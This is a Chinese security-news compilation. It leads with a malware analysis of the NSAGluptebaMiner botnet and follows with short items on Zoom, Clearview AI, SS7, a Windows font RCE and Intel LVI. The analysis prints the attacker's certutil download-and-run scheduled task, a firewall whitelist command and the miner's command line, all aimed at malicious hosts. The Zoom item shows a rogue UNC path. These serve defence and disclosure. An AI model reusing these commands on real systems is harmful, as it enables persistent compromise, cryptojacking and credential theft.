分类: 漏洞事件

挖矿僵尸网络 NSAGluptebaMiner 利用永恒之蓝漏洞传播

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/mdgGiYwb722GuE6QtJTzPQ   一、概述 腾讯安全威胁情报中心检测到挖矿僵尸网络NSAGluptebaMiner变种正在利用永恒之蓝漏洞攻击传播。目前该僵尸网络会控制机器进行门罗币挖矿和搜集用户隐私数据,并具有远程执行命令的功能,同时还会利用比特币交易数据更新C2。 cloudnet.exe原来是Glupteba恶意木马,Glupteba最早作为Operation Windigo组织用于部署僵尸网络中的一部分首次出现,2018年6月腾讯安全威胁情报中心发现cloudnet.exe开始作为挖矿僵尸网络NSAGluptebaMiner的组件传播。 当前NSAGluptebaMiner版本具有以下特征: 利用永恒之蓝漏洞攻击传播; 安装计划任务实现持久化,任务利用certutil.exe下载木马; 利用密码提取器updateprofile.exe搜集浏览器记录的账号密码并上传; 绕过UAC,以管理员权限和系统权限运行,将木马程序加入防火墙策略白名单、Windows Defender查杀白名单; 安装驱动Winmon.sys、WinmonFS.sys、WinmonProcessMonitor.sys对木马进行保护; 运行门罗币挖矿程序wup.exe; 利用组件cloudnet.exe构建僵尸网络; 连接远程服务器,接收指令完成远控操作; 通过比特币交易数据更新C2地址。 二、详细分析 漏洞攻击成功后,Payload首先下载app.exe在内存中执行PE文件,并且将该文件释放到C:\Windows\rss\csrss.exe,csrss.exe是一个木马下载器,采用Go编程语言编写。 下载器首先获取当前应用程序信息、安装杀软信息、操作系统信息、硬件GPU、是否Admin用户,以及一些以二进制形式硬编码的信息来初始化“配置信息”,然后创建一个注册表项HKEY_CURRENT_USER\Software\Microsoft\<random>(8位随机字符)来存储所有获取的信息。(之前注册表为HKEY_USERS\ <sid>\Software\Microsoft\TestApp) 首先会检测是否在虚拟机中执行。 然后判断是否是系统权限,如果不是则通过以TrustedInstaller运行自己提高权限。 在”C:\Windows\System32\drivers\”目录下释放三个隐藏的sys文件,并加载对应的驱动程序: Winmon.sys用于隐藏对应PID进程; WinmonFS.sys隐藏指定文件或目录; WinmonProcessMonitor.sys查找指定进程,并关闭。 维护以系统服务的方式启动的木马(检查服务、下载安装服务、更新服务、删除服务)。 下载永恒之蓝漏洞漏洞利用程序,利用漏洞攻击局域网机器。 下载矿机和挖矿代理配置信息。 获取Glupteba僵尸网络代理程序Cloudnet.exe使用的下载地址和hash。 在handleCommand函数中实现后门功能,包括下载文件、程序执行等。 各函数及对应操作如下: 函数 操作 GetAppName 获取App名 IsAdmin 是否Admin账号 ProcessIsRunning 进程是否运行 Update 更新 Exec 执行程序 Download 下载 DownloadAndRun 下载并执行 DownloadAndRunExtended 下载并执行扩展 Exit 退出 UpdateData 更新数据 UpdateCloudnet 更新cloudnet.exe StopWUP 停止挖矿程序wup.exe UpdateService 更新服务 GetLogfileProxy 读取日志文件\proxy\t GetLogfileI2Pd 读取日志文件\i2pd\i2pd.log Notify 开启心跳包,在指定的时间间隔进行上报 NotifyHost 上报主机 EventExists 判断event是否存在 MutexExists 判断Mutuex是否存在 RegistryGetStartup 注册自启动项 VerifySignature 验证文件签名 RegistryGetStartupSignatures 验证启动项文件签名 VerifyProcessesSignatures 验证进程文件签名 GetUnverifiedFiles 上报未签名的文件 GetStatsWUP 获取挖矿木马统计信息 UploadFile 上传文件 Install 下载并安装 SC 截屏 UpdateCDN 更新C2 DiscoverElectrum 使用硬编码的以太币钱包,读取区块链交易数据 DiscoverBlockchaincom 从区块链交易数据中获取加密的新的C2地址 设置防火墙规则,将csrss.exe添加到白名单: `netsh advfirewall firewall add rule name=”csrss” dir=in action=allow program=”C:\Windows\rss\csrss.exe” enable=yes` 写入windows defender规则,添Winmon、WinmonFS、WinmonProcessMonitor加到白名单: cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)   安装名为“ScheduledUpdate”的计划任务,任务内容为:每当用户登陆时,利用certutil.exe下载app.exe,保存为scheduled.exe并运行: `schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR “cmd.exe /C certutil.exe -urlcache -split -f https[:]//biggames.online/app/app.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340” /TN ScheduledUpdate /F` 灵活更新C2: 通过公开的列表查询Electrum比特币钱包服务器,使用硬编码的hash值查询对应的区块链脚本hash记录,对返回的数据进行AES解密得到新的C2地址。 组件updateprofile.exe为密码提取器,也使用Go编写,并使用UPX壳保护。 运行后搜集包括Chrome,Opera和Yandex浏览器的cookie、历史记录和其他配置文件中的账号密码,打包上传到远程服务器。 组件cloudnet.exe负责构建僵尸网络, 会读取注册表中存放的UUID进行校验,在注册表“HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CloudNet”下写入文件版本、路径等信息,移动自身到“\cloudnet\”文件夹下,连接C2服务器,接收远控指令。 组件wup.exe负责挖矿门罗币,csrss.exe启动wup.exe时传递参数 `C:\Users\Administrator\AppData\Local\Temp\wup\wup.exe -o stratum+tcp[:]//premiumprice.shop:50001 -u d244dab5-f080-4e0d-a79c-4eeb169b351b -p x –nicehash -k –api-port=3433 –api-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –http-port=3433 –http-access-token=d244dab5-f080-4e0d-a79c-4eeb169b351b –donate-level=1 –randomx-wrmsr=-1 –background` Temp目录下的wup.exe负责下载矿机程序和挖矿配置文件,最后执行另一同名文件C:\Users\Administrator\AppData\Local\Temp\csrss\wup\xarch\wup.exe开启挖矿,该文件由开源挖矿程序XMRig编译。   三、安全建议 企业网管可以使用腾讯T-Sec终端安全管理系统清除病毒。 也可检查以下各项,如有进行清除: 目录和文件: C:\Users\Administrator\AppData\LoCal\Temp\Csrss\smb\ C:\users\administrator\appdata\loCal\temp\Csrss\ C:\Windows\rss\Csrss.exe C:\Windows\windefender.exe C:\Windows\System32\drivers\Winmon.sys C:\Windows\System32\drivers\WinmonFS.sys C:\Windows\System32\drivers\WinmonProCessMonitor.sys C:\users\administrator\appdata\loCal\temp\Csrss\Cloudnet.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\sCheduled.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\updateprofile.exe C:\Users\Administrator\AppData\LoCal\Temp\wup\wup.exe C:\Users\Administrator\AppData\LoCal\Temp\Csrss\wup\xarCh\wup.exe 注册表: HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\TestApp HKEY_CURRENT_USER\SOFTWARE\MiCrosoft\<random>\<random> HKEY_CURRENT_USER\SOFTWARE\EpiCNet InC.\CloudNet HKEY_CURRENT_USER\Software\MiCrosoft\<random> HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\Winmon HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonFS HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\WinmonProCessMonitor HKEY_USERS\sid\Software\MiCrosoft\Windows\CurrentVersion\Run\DeliCateFrost 计划任务: ScheduledUpdate IOCs Domain biggames.club biggames.online deepsound.live sndvoices.com 2makestorage.com infocarnames.ru URL http[:]//biggames.club/app/app.exe https[:]//infocarnames.ru/ru53332/-RTMD-AIyBxl2ebgAAvhwCAEVTFwAfAOm6EgMA.exe md5 b1c081429c23e3ef0268fd33e2fe79f9 da75bc9d4d74a7ae4883bfa66aa8e99b 00201e5ad4e27ff63ea32fb9a9bb2c2e 6918fd63f9ec3126b25ce7f059b7726a fcf8643ff7ffe5e236aa957d108958c9 9b47b9f19455bf56138ddb81c93b6c0c 0dbecc91932301ccc685b9272c717d61 矿池: premiumprice.shop:50001 参考链接 https://www.freebuf.com/articles/system/172929.html https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/

Android 10 被曝 Bug:APP 无响应

4月21日消息,据Android Police报道,近期不少人反映谷歌Pixel手机在运行部分APP时经常出现无响应的情况。报道指出,这是Android 10系统存在的Bug,该Bug不仅影响了谷歌Pixel设备,其它手机品牌也受到了不同程度的影响。 当APP出现无响应情况时,整个系统也会受到影响,导致整个系统不能操作,自然也就无法退出该应用程序,只能是强制锁屏,然后再解锁进入。 Android Police称该场景出现频率较高,一天可能要发生多次。受此影响的APP有YouTube、Twitter、亚马逊、YouTube音乐、Google Play商店等等。 更糟糕的是,这个Bug也影响到了Android 11。外媒发现运行Android 11开发者预览版的Pixel 3也同样遇到了这个问题,这说明Android 11开发版上有可能引入了Android 10稳定版上的错误代码。 目前Android Police已经与谷歌取得联系,但是谷歌尚未对此作出回应,预计问题会在下一版更新中解决。   (稿源:cnBeta,封面源自网络。)

网络安全漏洞暴露了 Clearview AI 的源代码和应用程序数据

备受争议的面部识别创业公司Clearview AI的安全漏洞意味着其源代码,一些秘密密钥和云存储凭据,甚至其应用程序的副本都可以公开访问。 TechCrunch报道说,网络安全公司SpiderSilk的首席安全官Mossab Hussein发现了Clearview AI一个暴露的服务器,他发现该服务器被配置为允许任何人注册为新用户并登录。 Clearview AI最早在1月份成为头条新闻,当时《纽约时报》的一次曝光详细介绍了其庞大的面部识别数据库,其中包括从网站和社交媒体平台上抓取的数十亿张图像。用户上传感兴趣的人的照片,Clearview AI的软件将尝试将其与数据库中任何相似的图像进行匹配,从而有可能从单个图像中揭示一个人的身份。 自从其作品公开以来,Clearview AI一直辩护说自己的软件仅适用于执法机构。但是,有报道称Clearview一直在向包括梅西百货和百思买在内的私营企业销售其系统。现在,此类不良的网络安全做法可能会使此功能强大的工具落入公司客户列表之外的不法之徒手中。 据TechCrunch称,该服务器包含公司面部识别数据库的源代码,以及允许访问其Windows,Mac,Android和iOS应用程序副本云存储的密钥和凭据。Mossab Hussein因此能够截取该公司iOS应用程序的屏幕截图,苹果公司最近因为违反其规则而阻止了该应用程序。Mossab Hussein还表示,他可以访问该公司的Slack令牌,这可能允许访问该公司的内部私人通讯。 Mossab Hussein还说,他从该公司的云存储中发现了大约7万个视频,这些视频是从一栋住宅楼中安装的摄像头拍摄的。 Clearview AI的创始人Hoan Ton-That告诉TechCrunch,这些镜头是在大楼管理层许可下捕获的,这是尝试制作安全摄像机原型的一部分。据报道该建筑物本身位于曼哈顿,但TechCrunch指出,负责该建筑物的房地产公司未回复置评请求。 针对网络安全故障,Clearview AI表示,未公开任何可识别个人身份的信息,搜索历史或生物识别信息并补充说公司已对服务器进行了全面的审核,以确认未发生其他未经授权的访问,这表明Mossab Hussein是唯一访问配置错误服务器的人,服务器公开的密钥也已更改,因此它们不再起作用。 上市后,Clearview AI的系统遭到了科技公司和美国当局的激烈批评。用于建立其数据库的平台(包括Facebook,Twitter和YouTube)已指示Clearview停止抓取图像,已告知警察部门不要使用该软件,佛蒙特州总检察长办公室最近针对该指控展开了调查。它可能违反了数据保护规则。   (稿源:cnBeta,封面源自网络。)

疫情期间美国 IC3 网络犯罪报告量激增 每天接到 3000-4000 起

自新冠病毒疫情在美国蔓延以来,联邦调查局的网络犯罪投诉中心(IC3)接到的网络犯罪举报量激增,主要是因为美国国内和国际黑客试图在这个时间段进行各种网络攻击活动。 美国联邦调查局网络部副助理主任托尼娅·乌戈雷茨(Tonya Ugoretz)周四表示,IC3每天收到3000-4000起网络安全投诉,而在疫情爆发之前每天收到的投诉量维持在1000起左右。 本周四由Aspen Institute主办的网络研讨会上,乌戈雷茨表示:“我们的网络漏洞越来越多,也增加了威胁者利用这些漏洞的兴趣。” 乌戈雷茨表示许多黑客来自于那些“渴望深入了解”新冠肺炎相关研究的国家,而“远程工作的快速转变”已经为黑客提供了大量供他们利用的网络漏洞。 乌戈雷茨提到:“各国对有关病毒的信息非常感兴趣,例如关于疫苗的信息。我们的确发现有侦察活动,一些攻入那些机构的行为,尤其是那些公开表示自己在研究新冠肺炎的机构。” 乌戈雷茨称,研究潜在疗法或疫苗的机构公开宣传自己在做这件事情是合情合理的。但是她指出,“不好的一面是,这会让他们成为其他有兴趣搜集研究细节的国家的目标,这些国家甚至可能会窃取这些机构的知识产权信息。”她表示,FBI发现,这些由国家支持的黑客组织也试图攻入美国医疗保健系统。   (稿源:cnBeta,封面源自网络。)

安全漏洞让用户紧张 Zoom引入重量级安全员修复

4月17日消息,据国外媒体报道,由于视频会议平台Zoom的安全漏洞引起美国相关部门注意且让客户担忧,公司雇佣了一批重量级安全员来修复漏洞。 疫情期间广受欢迎的Zoom在过去两周内已经聘请了数十名外部安全顾问。据知情人士透露,这些人中有来自Facebook、微软和谷歌等公司的前安全和隐私专家,他们希望迅速解决有关安全漏洞的问题。 Facebook前首席安全官亚历克斯·斯塔莫斯(Alex Stamos)表示,Zoom此举是借鉴了微软将近20年前为恢复Windows软件形象而采取的行动。微软在2002年转向“值得信赖的计算”之前,存在多年的安全问题让Windows用户容很易受到互联网蠕虫和其他病毒的攻击,从而损害微软的声誉。 疫情期间数百万人呆在家中,使得Zoom人气飙升,也引来了很多网络流氓和黑客的注意,以及隐私倡导者的审查。未经授权闯入会议的“Zoombombing”现象成为许多用户面临的问题。 报道称,安全专家在Zoom用于保护对话安全的密码系统中发现了大量软件漏洞和错误,这让Zoom公司受到打击。 据曾与公司合作过的顾问说,Zoom公司修复其系统和声誉所利用的资源远远少于当时已经是软件巨头的微软公司。 “他们被推到聚光灯下接受世界上最大科技公司才会受到的严格审查,”斯塔莫斯说。“那些公司往往有数百名工程师组成的团队,多年专门致力于安全实践。” Zoom目前引入的安全公司包括英国安全供应商NCC Group PLC、总部位于美国纽约的Trail of Bits、位于亚利桑那州坦佩的Bishop Fox以及位于德克萨斯州奥斯汀的Praetorian Security等公司。Zoom还正在使用CrowdStrike和Queen Associates旗下安全情报机构DarkTower提供的安全情报服务。 Zoom公司首席执行官袁征在4月1日的一篇博客文章中宣布,Zoom公司将冻结产品开发,并承诺在未来90天内解决公司安全问题。几天后他说,“我真的搞砸了。”他还表示,公司现在会优先考虑安全性,而不是易用性。   (稿源:网易科技,封面源自网络。)

微软发布字体解析远程代码执行漏洞补丁,建议用户尽快修补

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg 漏洞背景 3月23日,微软发布公告ADV200006称Adobe Type Manager Library中存在2个未修补的漏洞,当Windows Adobe Type Manager Library处理Adobe Type 1 PostScript 格式字体时存在两个远程执行代码漏洞。 4月15日,谷歌安全团队称已发现该漏洞的野外利用,微软在4月例行安全更新中,已修补CVE-2020-1020/CVE-2020-0938漏洞。 腾讯安全团队已对漏洞进行分析,该漏洞可稳定利用: 视频详见:https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg 漏洞版本 Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for ARM64-based Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Version 1803 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows 10 Version 1809 for ARM64-based Systems Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows 8.1 for 32-bit systems Windows 8.1 for x64-based systems Windows RT 8.1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1803 (Server Core Installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) 漏洞分析 漏洞模块为atmfd.sys(Windows 10 1703后是fontdrvhost.exe),成因在于Windows解析PostScript字体中的BlendDesignPositions或BlendVToHOrigin时,没有经过安全检查,导致处理模块可能引发越界写,栈溢出的问题。 SetBlendDesignPositions BlendDesignPositions格式如下: Win7 x86环境下,atmfd!SetBlendDesignPositions在解析BlendDesignPositions array时,会将内容全部保存到栈上,缓冲区的大小是960(0x3C0),因此最多存放16个sub-array,当sub-array数量大于16时,会引发溢出: ParseBlendVToHOrigin atmfd!ParseBlendVToHOrigin在处理数组BlendVToHOrigin时存在两处溢出。 Win7x86下由于定义的int v12[2]仅有8个字节,当NumMasters大于2时,引发缓冲区溢出: NumMasters大小可以在字体文件中通过构造特殊的BlendDesignPositions或WeightVector控制: 第二处溢出发生在atmfd.sys读取BlendVToHOrigin时,首先获取当前NumMasters并根据其大小将BlendVToHOrigin的数据复制到栈中的V11,由于NumMasters可控,当NumMasters过大时会对栈中的v11造成溢出,V11同样也是8字节: 第二次溢出时,由于V12在V11的高地址方向,所以当V11溢出时会覆写V12中保存的指针。 补丁分析 由于win7已停止更新,win10 1703后微软把atmfd.sys模块的功能移植到fontdrvhost.exe中,补丁前后漏洞模块共做了2处修改,2个函数均存在栈溢出漏洞: 补丁后SetBlendDesignPositions中增加了条件判断,sub-array数量超过16时返回错误,避免溢出: 补丁后ParseBlendVToHOrigin中启用了GS保护栈的完整性,并在读取BlendVToHOrigin数组前,限制了NumMasters大小; 解决方案 1. 推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客利用漏洞的攻击行为进行检测。腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 腾讯T-Sec高级威胁检测系统可检测利用Type 1字体漏洞的攻击行为 2.推荐企业用户使用腾讯T-Sec终端安全管理系统(御点)修补各终端系统的安全漏洞,个人用户可使用腾讯电脑管家的漏洞修补功能安装补丁,也可使用Windows Update。 时间线 3月23日,微软发布通告ADV200006称Adobe Type Manager Library中存在2个未修补的漏洞; 3月24日,腾讯安全发布漏洞通告; 4月15日,微软官方发布CVE-2020-1020/CVE-2020-0938漏洞通告及补丁。 参考链接: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938

Zoom 客户端爆出安全漏洞 可向攻击者泄露 Windows 登陆凭据

近日,Windows 版 Zoom 客户端爆出了容易受到 NUC 路径注入攻击的安全漏洞。作为一款音视频会议应用,Zoom 还允许用户在聊天界面通过发送文本消息来互相交流。然而外媒 Bleeping Computer 指出,攻击者可利用聊天模块的漏洞,窃取点击了相关链接的用户的 Windows 登陆凭据。 发送聊天消息时,所有发送的 URL 都将经过转换,以便群内其他成员点击,继而在默认的浏览器中打开网页。 然而安全研究人员 @ _g0dmode 发现,Zoom 客户端竟然还将 Windows 网络 UNC 路径,也转换成了聊天消息中可单击的链接。 如图所示,常规 URL 和 NUC 路径(\\evil.server.com\images\cat.jpg),都被转换成了聊天消息中的可点击链接。 若用户单击 UNC 路径链接,则 Windows 将尝试使用 SMB 文件共享协议连接到远程站点,以打开远程路径中的 cat.jpg 文件。 默认情况下,Windows 将发送用户的登录名和 NTLM 密码哈希值,但稍有经验的攻击者均可借助 Hashcat 之类的免费工具来逆向运算。 安全研究人员 Matthew Hickey(@ HackerFantastic)实测发现,其能够在 Zoom 中顺利注入,并且可以借助当前的民用级 GPU 和 CPU 来快速破解。 除了窃取 Windows 登陆凭据,Hickey 还向 Bleeping Computer 透露,通过点击链接的方式,UNC 注入还适用于启动本地计算机上的程序(比如 CMD 命令提示符)。 庆幸的是,Windows 会在程序被执行前发出是否允许其运行的提示。想要堵上这一漏洞,Zoom 必须阻止 Windows 客户端的 UNC 路径转换功能(屏蔽部分可点击的超链接)。 据悉,Hickey 已经在 Twitter 上向 Zoom 官方发去了有关该安全漏洞的通知,但目前尚不清楚该公司已采取怎样的行动。 注重安全的客户,可在官方补丁发布前,通过组策略来限制向远程服务器传出 NTLM 通信(参考如下操作): 计算机配置 -> Windows 设置 -> 安全设置 -> 本地策略 -> 安全选项 -> 网络安全:限制NTLM -> 发送到远程服务器的 NTLM 通信(然后全部配置为拒绝)。 需要注意的是,如果在已经加入相关域的计算机上配置上述组策略时,可能会在尝试访问共享时遇到问题。 如果是无权访问组策略设置 Windows 10 家庭版用户,亦可使用注册表编辑器来完成相关限制操作(dword 配置为 2): [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0]”RestrictSendingNTLMTraffic”=dword:00000002 如需正确创建此键值,Windows 用户记得以管理员身份来启动注册表编辑器。 若日后有必要恢复默认发送 NTLM 凭据的 Windows 行为,也只需删除对应的 RestrictSendingNTLMTraffic 键值。   (稿源:cnBeta,封面源自网络。)  

冠状病毒爆发期间 研究人员在 Zoom 当中发现更多安全问题

在冠状病毒爆发期间,视频会议应用程序和服务使用率增加,导致安全人员在Zoom当中发现更多安全问题。据报道,视频会议服务Zoom可以通过解决苹果常规安全措施而在Mac上安装,并且还宣传其具有端到端加密功能,但显然没有。 之前它已将用户数据发送到Facebook(据称已修复),现在它还被指控存在两个单独的安全问题。Twitter用户@ c1truz_(恶意软件跟踪器VMRay的技术负责人)报告说,Zoom的Mac应用安装程序使用了预安装脚本,并据称显示了伪造的macOS系统消息。 c1truz称,在Mac上安装该应用程序时,无需用户给出最终同意,并且高度误导性的提示用于获得root特权。AppleInsider已就指控指控与Zoom取得联系,但尚未收到评论。苹果也没有公开发表评论。不过,之前苹果为纠正Zoom安全问题而强制对用户进行Mac OS更新。 另外,The Intercept声称Zoom并不是真正的端到端加密,在整个视频聊天中,用户和Zoom服务器之间的连接被加密,但是并不能阻止Zoom本身看到呼叫过程。Intercept说:“实际上,Zoom使用了其自己的术语定义,这使Zoom本身可以访问会议中未加密的视频和音频。”Zoom发言人向The Intercept证实了这一点,并表示当前无法为Zoom视频会议启用E2E加密。   (稿源:cnBeta,封面源自网络。)

沙特利用 SS7 漏洞可监控美国任意手机用户位置和信息

立法者和安全专家不断发出警告:全球蜂窝网络存在诸多安全隐患。近日一位告密者称,沙特政府在实施“systematic”监视活动中,利用这些漏洞可以追踪任意美国公民的信息。 systematic是沙特监视海外公民的大型活动,利用强大的移动间谍软件入侵持不同政见者和激进分子的电话以监视其活动。而其中就包括华盛顿邮报专栏作家贾马尔·卡舒吉(Jamal Khashoggi),后者于2018年在领事馆内被沙特特工团队杀害。 根据英国卫报获得的数据缓存,记录了从去年11月开始的4个月时间内数百万沙特公民的位置信息。在报道称,这些位置追踪信息是沙特的三大手机运营商通过七号信令系统(SS7,Signaling System Number 7)漏洞而执行的,而有理由相信背后有沙特政府的影子。 七号信令系统是一种被广泛应用在公共交换电话网、蜂窝通信网络等现代通信网络的共路信令系统。七号信令系统是国际电信联盟推荐首选的标准信令系统。这也是T-Mobile用户可以拨打AT&T用户电话或者给Verizon用户发送短信的原因。 不过专家表示该系统存在诸多漏洞可以让攻击者通过运营商来接听电话和阅读短信。SS7还允许运营商通过发出“提供订户信息”(PSI)请求来跟踪设备所在未知,精度可以达到几百英尺范围。这些PSI请求通常是为了确保正确地向该小区用户计费,例如他们是否在另一个国家的运营商上漫游。 但是尽管有多年的警告和大量关于利用该系统进行攻击的报道,但美国最大运营商几乎没有采取任何措施来确保外国间谍不会滥用其网络进行监视。 美国联邦参议院情报委员会成员罗恩·怀登(Ron Wyden)表示:“我一直在警告美国运营商存在该安全漏洞。如果这份报告是正确的,那么政府机构就可以介入美国的无线网络以追踪我们国内的任何人。” 负责监管蜂窝网络的机构FCC发言人未回应置评请求。     (稿源:cnBeta,封面源自网络。)

Intel 处理器曝新漏洞 打补丁性能骤降 77%

幽灵、熔断漏洞曝光后,Intel、AMD处理器的安全漏洞似乎突然之间增加了很多,其实主要是相关研究更加深入,而新的漏洞在基本原理上也差不多。事实上,Intel、AMD、ARM、IBM等芯片巨头都非常欢迎和支持这类漏洞安全研究,有助于提升自家产品的安全性,甚至资助了不少研究项目,近日新曝光的LVI漏洞就是一个典型。 LVI的全称是Load Value Injection,大致就是载入值注入的意思,由安全研究机构BitDefender首先发现,并在今年2月10日汇报给Intel。 它影响Intel Sandy Bridge二代酷睿以来的绝大部分产品,只有Cascade Lake二代可扩展至强、Coffee Lake九代酷睿Comet Lake十代酷睿部分免疫,Ice Lake十代酷睿完全免疫。 该漏洞可以让攻击者绕过Intel SGX软件保护扩展机制,从处理器中窃取敏感信息,类似幽灵漏洞,不过Intel、BitDefender都认为它只有理论攻击的可能,暂不具备实质性威胁。 Intel表示,受影响产品只有关闭超线程才能规避此漏洞,不过同时Intel也更新了SGX平台软件、SDK开发包,以避免潜在的安全威胁,简单说就是在受影响指令前增加了一道LFENCE指令保护墙。 Intel以往的安全补丁经常会影响性能,但幅度都不是很大,这次又会怎样呢? Phoronix找了一颗至强E3-1275 v6(Kaby Lake),在Linux环境下进行了测试,包括未打补丁、分支预测前载入LFENCE、RET指令前载入LFENCE、载入后执行LFENCE、同时载入LFENCE/RET/分支预测。 结果发现,分支预测和RET指令前载入LFENCE影响不大,性能只损失3%、8%左右,但后两种情况损失惨重,幅度高达77%。 这不是一夜回到解放前,直接就打回原始社会了…… 不过幸运的是,LVI漏洞对普通消费者可以说几乎毫无影响,因为主流PC根本用不到SGX,企业用户倒是因为经常使用SGX、虚拟化而必须重视起来。 同样幸运的是,要想利用这个漏洞极为复杂,理论上可以通过JavaScript发起攻击,但难度极大。   (稿源:cnBeta,封面源自网络。)